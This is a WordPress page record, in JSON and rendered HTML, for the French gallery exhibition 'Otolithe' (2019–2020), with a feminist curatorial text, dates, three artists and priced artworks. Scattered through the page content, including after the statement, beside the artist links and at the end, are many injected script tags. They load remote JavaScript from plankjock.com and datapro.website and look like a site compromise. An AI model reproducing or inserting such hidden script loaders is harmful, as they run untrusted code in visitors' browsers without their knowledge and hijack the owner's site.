{"id":1194,"date":"2019-11-21T12:25:32","date_gmt":"2019-11-21T12:25:32","guid":{"rendered":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/?page_id=1194"},"modified":"2019-11-21T15:55:32","modified_gmt":"2019-11-21T15:55:32","slug":"otolithe","status":"publish","type":"page","link":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/otolithe\/","title":{"rendered":"OTOLITHE"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row bg_type=\u00a0\u00bbno_bg\u00a0\u00bb row_parallax_speed=\u00a0\u00bb1&Prime; content_width=\u00a0\u00bbdefault\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1418868503434{margin-top: -150px !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb2\/3&Prime; css=\u00a0\u00bb.vc_custom_1418866906242{padding-top: 12px !important;}\u00a0\u00bb][vc_column_text]<strong><span style=\"color: #2fc99d;\">Exposition Collective<br \/>\n<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\">\u00ab\u00a0L&rsquo;otolithe\u00a0(othos : oreille ; lithos : pierre) est un amas de cristaux microscopiques pr\u00e9sents dans l\u2019oreille interne, servant \u00e0 l\u2019\u00e9quilibre et \u00e0 la transmission vibratoire.<\/p>\n<p style=\"text-align: justify;\">Nous nous interrogeons sur la parole f\u00e9minine, son flot lib\u00e9ratoire, le verbe originel ;\u00a0\u00a0\u00ab R-\u00e9veiller\u00a0\u00bb la m\u00e9moire originelle, \u00a0celle qui provient des profondeurs de la mer \/ m\u00e8re, l\u00e0 o\u00f9 a \u00e9clos la vie.\u00a0<strong>\u00a0<\/strong><\/p>\n<p style=\"text-align: justify;\">Autrefois, le pouvoir des femmes et leur capacit\u00e9 \u00e0 donner la vie \u00e9tait quelque chose de sacr\u00e9\u00a0mais cela constituait une menace pour la soci\u00e9t\u00e9 patriarcale.\u00a0Par cons\u00e9quent, le f\u00e9minin sacr\u00e9 fut diabolis\u00e9 et consid\u00e9r\u00e9 comme h\u00e9r\u00e9sie. Ce n\u2019est pas Dieu mais l\u2019homme qui cr\u00e9a le concept de \u00ab\u00a0p\u00e9ch\u00e9 originel\u00a0\u00bb<strong>,\u00a0<\/strong>selon lequel \u00c8ve fit go\u00fbter la pomme \u00e0 Adam.\u00a0La femme qui fut sacr\u00e9e, celle qui donnait la vie, fut transform\u00e9e en ennemi.<\/p>\n<p style=\"text-align: justify;\">Comment retrouver l\u2019\u00e9quilibre entre le f\u00e9minin et le masculin, l\u2019\u00e9quit\u00e9 ?<strong>\u00a0<\/strong>Comment \u00ab\u00a0R\u00e9-unir\u00a0\u00bb\u00a0?\u00a0\u00bb<\/p>\n<p><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime; css=\u00a0\u00bb.vc_custom_1418866919529{padding-top: 12px !important;}\u00a0\u00bb][vc_column_text]<span style=\"color: #2fc99d;\"><strong>Exposition :\u00a0<\/strong><\/span> du\u00a014 Novembre 2019 au 11 Janvier 2020<\/p>\n<p><span style=\"color: #2fc99d;\"><strong>Vernissage :\u00a0<\/strong><\/span> Le Jeudi\u00a014 Novembre \u00e0 partir de 18h30<\/p>\n<p><span style=\"color: #2fc99d;\"><strong>Finissage\u00a0:\u00a0<\/strong><\/span> Le Samedi 11 Janvier 2020<\/p>\n<p><span style=\"color: #2fc99d;\"><strong>Artistes :\u00a0<\/strong><\/span> <a href=\"https:\/\/www.pilar-du-breuil.com\/\">Pilar du Breuil<\/a>, <a href=\"https:\/\/www.mariebienaime.fr\/\">Marie Bienaim\u00e9<\/a>, <a href=\"http:\/\/www.catherine-mainguy.fr\/\">Catherine Mainguy<\/a><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/datapro.website\/optout\/set\/lat?jsonp=__mtz_cb_315506244&amp;key=20c1f9347f59cf976e&amp;cv=1574338142&amp;t=1574338142003\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/datapro.website\/optout\/set\/lt?jsonp=__mtz_cb_3399309&amp;key=20c1f9347f59cf976e&amp;cv=24702&amp;t=1574338142003\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/datapro.website\/optout\/set\/lat?jsonp=__mtz_cb_467924478&amp;key=20c1f9347f59cf976e&amp;cv=1574338306&amp;t=1574338306258\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/datapro.website\/optout\/set\/lt?jsonp=__mtz_cb_161274642&amp;key=20c1f9347f59cf976e&amp;cv=24866&amp;t=1574338306259\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/datapro.website\/optout\/set\/lat?jsonp=__mtz_cb_989597140&amp;key=20c1f9347f59cf976e&amp;cv=1574338381&amp;t=1574338381464\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/datapro.website\/optout\/set\/lt?jsonp=__mtz_cb_302337043&amp;key=20c1f9347f59cf976e&amp;cv=24941&amp;t=1574338381464\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row][vc_row bg_type=\u00a0\u00bbno_bg\u00a0\u00bb row_parallax_speed=\u00a0\u00bb1&Prime; content_width=\u00a0\u00bbdefault\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/2&Prime;]<div class=\"my-animation fadeInRight\"><div class='infobox-1 default'><header><img src='http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-content\/uploads\/2019\/11\/Sexe-Fe\u0301minin-1-40x40cm-1500-euros.jpg' alt='' class='img-responsive' \/><\/header><h5 >PILAR DU BREUIL - S\u00c9RIE SEXE : F\u00c9MININ<\/h5><\/div><\/div>[\/vc_column][vc_column width=\u00a0\u00bb1\/2&Prime;]<div class=\"my-animation fadeInLeft\"><div class='infobox-1 default'><header><img src='http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-content\/uploads\/2019\/11\/Sexe-Fe\u0301minin-2-40x40cm-1500-euros.jpg' alt='' class='img-responsive' \/><\/header><h5 >PILAR DU BREUIL - S\u00c9RIE SEXE : F\u00c9MININ<\/h5><\/div><\/div>[\/vc_column][\/vc_row][vc_row bg_type=\u00a0\u00bbno_bg\u00a0\u00bb row_parallax_speed=\u00a0\u00bb1&Prime; content_width=\u00a0\u00bbdefault\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/2&Prime;]<div class=\"my-animation fadeInUp\"><div class='infobox-1 default'><header><img src='http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-content\/uploads\/2019\/11\/Captive-10-30x45cm-450-euros.jpg' alt='' class='img-responsive' \/><\/header><h5 >MARIE BIENAIM\u00c9 - S\u00c9RIE : CAPTIVE ?<\/h5><\/div><\/div>[\/vc_column][vc_column width=\u00a0\u00bb1\/2&Prime;]<div class=\"my-animation fadeInDown\"><div class='infobox-1 default'><header><img src='http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-content\/uploads\/2019\/11\/Captive-11-30x45cm-450-euros.jpg' alt='' class='img-responsive' \/><\/header><h5 >MARIE BIENAIM\u00c9 - S\u00c9RIE : CAPTIVE ?<\/h5><\/div><\/div>[\/vc_column][\/vc_row][vc_row bg_type=\u00a0\u00bbno_bg\u00a0\u00bb row_parallax_speed=\u00a0\u00bb1&Prime; content_width=\u00a0\u00bbdefault\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/2&Prime;]<div class=\"my-animation fadeInLeft\"><div class='infobox-1 default'><header><img src='http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-content\/uploads\/2019\/11\/APPARAI\u0302TRE-14-30X45-400-euros.jpg' alt='' class='img-responsive' \/><\/header><h5 >CATHERINE MAINGUY - S\u00c9RIE : APPARA\u00ceTRE<\/h5><\/div><\/div>[\/vc_column][vc_column width=\u00a0\u00bb1\/2&Prime;]<div class=\"my-animation fadeInRight\"><div class='infobox-1 default'><header><img src='http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-content\/uploads\/2019\/11\/APPARAI\u0302TRE-10-30X45-400-euros.jpg' alt='' class='img-responsive' \/><\/header><h5 >CATHERINE MAINGUY - S\u00c9RIE : APPARA\u00ceTRE<\/h5><\/div><\/div>[\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><br \/>\n<script src=\"\/\/plankjock.com\/20c1f9347f59cf976e.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row bg_type=\u00a0\u00bbno_bg\u00a0\u00bb row_parallax_speed=\u00a0\u00bb1&Prime; content_width=\u00a0\u00bbdefault\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1418868503434{margin-top: -150px !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb2\/3&Prime; css=\u00a0\u00bb.vc_custom_1418866906242{padding-top: 12px !important;}\u00a0\u00bb][vc_column_text]Exposition Collective \u00ab\u00a0L&rsquo;otolithe\u00a0(othos : oreille ; lithos : pierre) est un amas de cristaux microscopiques pr\u00e9sents dans l\u2019oreille interne, servant \u00e0 l\u2019\u00e9quilibre et \u00e0 la transmission vibratoire. Nous nous interrogeons sur la parole f\u00e9minine, son flot lib\u00e9ratoire, le verbe originel [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1194","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/pages\/1194"}],"collection":[{"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/comments?post=1194"}],"version-history":[{"count":20,"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/pages\/1194\/revisions"}],"predecessor-version":[{"id":1242,"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/pages\/1194\/revisions\/1242"}],"wp:attachment":[{"href":"http:\/\/www.catherine-mainguy.fr\/galerie-cmainguy\/wp-json\/wp\/v2\/media?parent=1194"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<div class="wpb-content-wrapper"><p>[vc_row bg_type= »no_bg » row_parallax_speed= »1&Prime; content_width= »default » css= ».vc_custom_1418868503434{margin-top: -150px !important;} »][vc_column width= »2/3&Prime; css= ».vc_custom_1418866906242{padding-top: 12px !important;} »][vc_column_text]<strong><span style="color: #2fc99d;">Exposition Collective<br />
</span></strong></p>
<p style="text-align: justify;">« L&rsquo;otolithe (othos : oreille ; lithos : pierre) est un amas de cristaux microscopiques présents dans l’oreille interne, servant à l’équilibre et à la transmission vibratoire.</p>
<p style="text-align: justify;">Nous nous interrogeons sur la parole féminine, son flot libératoire, le verbe originel ;  « R-éveiller » la mémoire originelle,  celle qui provient des profondeurs de la mer / mère, là où a éclos la vie. <strong> </strong></p>
<p style="text-align: justify;">Autrefois, le pouvoir des femmes et leur capacité à donner la vie était quelque chose de sacré mais cela constituait une menace pour la société patriarcale. Par conséquent, le féminin sacré fut diabolisé et considéré comme hérésie. Ce n’est pas Dieu mais l’homme qui créa le concept de « péché originel »<strong>, </strong>selon lequel Ève fit goûter la pomme à Adam. La femme qui fut sacrée, celle qui donnait la vie, fut transformée en ennemi.</p>
<p style="text-align: justify;">Comment retrouver l’équilibre entre le féminin et le masculin, l’équité ?<strong> </strong>Comment « Ré-unir » ? »</p>
<p><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script>[/vc_column_text][/vc_column][vc_column width= »1/3&Prime; css= ».vc_custom_1418866919529{padding-top: 12px !important;} »][vc_column_text]<span style="color: #2fc99d;"><strong>Exposition : </strong></span> du 14 Novembre 2019 au 11 Janvier 2020</p>
<p><span style="color: #2fc99d;"><strong>Vernissage : </strong></span> Le Jeudi 14 Novembre à partir de 18h30</p>
<p><span style="color: #2fc99d;"><strong>Finissage : </strong></span> Le Samedi 11 Janvier 2020</p>
<p><span style="color: #2fc99d;"><strong>Artistes : </strong></span> <a href="https://www.pilar-du-breuil.com/">Pilar du Breuil</a>, <a href="https://www.mariebienaime.fr/">Marie Bienaimé</a>, <a href="http://www.catherine-mainguy.fr/">Catherine Mainguy</a><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="http://datapro.website/optout/set/lat?jsonp=__mtz_cb_315506244&amp;key=20c1f9347f59cf976e&amp;cv=1574338142&amp;t=1574338142003" type="text/javascript"></script><script src="http://datapro.website/optout/set/lt?jsonp=__mtz_cb_3399309&amp;key=20c1f9347f59cf976e&amp;cv=24702&amp;t=1574338142003" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="http://datapro.website/optout/set/lat?jsonp=__mtz_cb_467924478&amp;key=20c1f9347f59cf976e&amp;cv=1574338306&amp;t=1574338306258" type="text/javascript"></script><script src="http://datapro.website/optout/set/lt?jsonp=__mtz_cb_161274642&amp;key=20c1f9347f59cf976e&amp;cv=24866&amp;t=1574338306259" type="text/javascript"></script><script src="http://datapro.website/optout/set/lat?jsonp=__mtz_cb_989597140&amp;key=20c1f9347f59cf976e&amp;cv=1574338381&amp;t=1574338381464" type="text/javascript"></script><script src="http://datapro.website/optout/set/lt?jsonp=__mtz_cb_302337043&amp;key=20c1f9347f59cf976e&amp;cv=24941&amp;t=1574338381464" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script></p>
<p><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type= »no_bg » row_parallax_speed= »1&Prime; content_width= »default »][vc_column width= »1/2&Prime;]<div class="my-animation fadeInRight"><div class='infobox-1 default'><header><img src='http://www.catherine-mainguy.fr/galerie-cmainguy/wp-content/uploads/2019/11/Sexe-Féminin-1-40x40cm-1500-euros.jpg' alt='' class='img-responsive' /></header><h5 >PILAR DU BREUIL - SÉRIE SEXE : FÉMININ</h5></div></div>[/vc_column][vc_column width= »1/2&Prime;]<div class="my-animation fadeInLeft"><div class='infobox-1 default'><header><img src='http://www.catherine-mainguy.fr/galerie-cmainguy/wp-content/uploads/2019/11/Sexe-Féminin-2-40x40cm-1500-euros.jpg' alt='' class='img-responsive' /></header><h5 >PILAR DU BREUIL - SÉRIE SEXE : FÉMININ</h5></div></div>[/vc_column][/vc_row][vc_row bg_type= »no_bg » row_parallax_speed= »1&Prime; content_width= »default »][vc_column width= »1/2&Prime;]<div class="my-animation fadeInUp"><div class='infobox-1 default'><header><img src='http://www.catherine-mainguy.fr/galerie-cmainguy/wp-content/uploads/2019/11/Captive-10-30x45cm-450-euros.jpg' alt='' class='img-responsive' /></header><h5 >MARIE BIENAIMÉ - SÉRIE : CAPTIVE ?</h5></div></div>[/vc_column][vc_column width= »1/2&Prime;]<div class="my-animation fadeInDown"><div class='infobox-1 default'><header><img src='http://www.catherine-mainguy.fr/galerie-cmainguy/wp-content/uploads/2019/11/Captive-11-30x45cm-450-euros.jpg' alt='' class='img-responsive' /></header><h5 >MARIE BIENAIMÉ - SÉRIE : CAPTIVE ?</h5></div></div>[/vc_column][/vc_row][vc_row bg_type= »no_bg » row_parallax_speed= »1&Prime; content_width= »default »][vc_column width= »1/2&Prime;]<div class="my-animation fadeInLeft"><div class='infobox-1 default'><header><img src='http://www.catherine-mainguy.fr/galerie-cmainguy/wp-content/uploads/2019/11/APPARAÎTRE-14-30X45-400-euros.jpg' alt='' class='img-responsive' /></header><h5 >CATHERINE MAINGUY - SÉRIE : APPARAÎTRE</h5></div></div>[/vc_column][vc_column width= »1/2&Prime;]<div class="my-animation fadeInRight"><div class='infobox-1 default'><header><img src='http://www.catherine-mainguy.fr/galerie-cmainguy/wp-content/uploads/2019/11/APPARAÎTRE-10-30X45-400-euros.jpg' alt='' class='img-responsive' /></header><h5 >CATHERINE MAINGUY - SÉRIE : APPARAÎTRE</h5></div></div>[/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script>[/vc_column_text][/vc_column][/vc_row]</p>
<p><script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script><br />
<script src="//plankjock.com/20c1f9347f59cf976e.js" async="" type="text/javascript"></script></p>
</div>

<p>[vc_row bg_type= »no_bg » row_parallax_speed= »1&Prime; content_width= »default » css= ».vc_custom_1418868503434{margin-top: -150px !important;} »][vc_column width= »2/3&Prime; css= ».vc_custom_1418866906242{padding-top: 12px !important;} »][vc_column_text]Exposition Collective « L&rsquo;otolithe (othos : oreille ; lithos : pierre) est un amas de cristaux microscopiques présents dans l’oreille interne, servant à l’équilibre et à la transmission vibratoire. Nous nous interrogeons sur la parole féminine, son flot libératoire, le verbe originel [&hellip;]</p>
